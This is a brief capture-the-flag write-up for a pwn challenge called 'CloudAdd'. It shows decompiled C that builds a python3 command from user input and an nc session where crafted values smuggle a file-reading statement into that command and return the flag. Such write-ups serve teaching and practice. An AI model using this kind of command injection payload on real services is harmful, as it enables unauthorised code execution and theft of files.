Tags: pwn
Rating:
# checksec
```bash
RELRO STACK CANARY NX PIE
Full RELRO Canary found NX enabled PIE enabled
```
# vulnerability
- you can found a python command injection vulnerabilty in the main()
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rbp
// ... skip ...
sub_1110(output_buff, "python3 -c 'print(%s + %s)'", v7, v8); // execute by untrusted input
sub_10D0(output_buff);
result = 0;
v6 = __readfsqword(0x28u);
v5 = v6 ^ v10;
if ( v6 != v10 )
result = sub_10C0(output_buff, "python3 -c 'print(%s + %s)'", v5);
return result;
}
```
# exploitation
```bash
r99bbit@parkmin-dev:~/ctf$ nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: );1
Variable two: 2;print(open("./flag","r").read()
flag{cL0uD_5Tr4tEgy}
```
